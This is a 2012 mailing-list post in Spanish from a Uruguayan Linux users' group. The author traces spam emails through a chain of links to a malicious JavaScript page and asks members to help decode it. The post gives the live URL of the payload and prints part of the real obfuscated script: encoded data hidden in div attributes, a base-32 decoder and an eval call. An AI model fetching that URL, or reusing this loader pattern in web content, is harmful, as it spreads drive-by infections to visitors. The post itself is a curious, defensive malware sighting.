[uylug-varios] ataques curiosos

Kenneth Irving ken at fq.edu.uy
Wed Oct 10 15:25:20 PDT 2012 

Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el 
último era un boletín de noticias trucho de CNN), pero que termina 
siempre en algo parecido. Son emails que siempre tienen algún link que te 
baja un HTML que contiene en su interior 3 o 4 links que te bajan un 
código Javascript, que lo único que hace es bajar algún otro archivo, este 
sí un HTML que contiene el código malicioso en javascript.

Paso el link final para bajar el código malicioso de javascript:

  http://2.cmisdfoundation.com/links/persons_jobs.php

y trascribo sólo parte del código. El código comienza con esto:

------------------------- comienzo ---------------------------------
<html><head><title></title></head><body><div 
dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div 
5 
8="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10 at 321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3 
p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c at 341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3 
c353e373k!381r311t31^" 
44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31 at 2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313 
e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e at 18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1 
83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12" 
49="42e3f34 at 353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3 
t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m at 352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3 
53e3k1e_37353k253c$353d353e3k(223p293418 at 341e34393m&2924191r39+361831" 
22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33 at 3k393f3e18 
&193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e at 3m353e343f&3i3s3s12 
12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
------------------------ [código cortado] ---------------------------

El bloque de datos codificados continúa, y el archivo termina con esto:
------------------------ [continuación] -----------------------------
  65="53i)23313j3518#191e3i353g*3c31333518
!1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12 at 171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39 at 1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
if(020==0x10)a=document.getElementsByTagName(dd)[1];
s="";
for(i=0;;i++){
 	if(window.document)r=a.getAttribute(i);
 	if(r){s=s+r;}else break;
}
a=s;
asd();
s="";
for(i=0;i<a.length;i+=2){
 	s+=String.fromCharCode(parseInt(a.substr(i,2),32));
}
c=s;
e=eval;
try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
 		</script></body></html>
-------------------- fin -------------------------------

Esto lo paso sólo como muestra y para no publicar el socotroco completo. 
Es más práctico simplemente bajarlo desde el link original.

Es obvio que el bloque de datos codificados e decodificado en el código 
javascript final, y luego de decodificarlo se ejecuta con el "e(c)".

Imagino que debe tratarse de código javascript ofuscado para explotar 
alguna debilidad de algún navegador o algún cliente de email, pero mis 
pobres conocimientos de javascript no me han permitido decodificar esto 
sin riesgo, por lo que lo publico en esta lista, tal vez alguien con 
suficiente curiosidad pueda decodificarlo y hacernos saber de qué se 
trata. Es simplemente curiosidad, me resultó muy interesante el trabajo 
que se toman para ocultar el código malicioso.

saludos

  Kenneth

More information about the Uylug-varios mailing list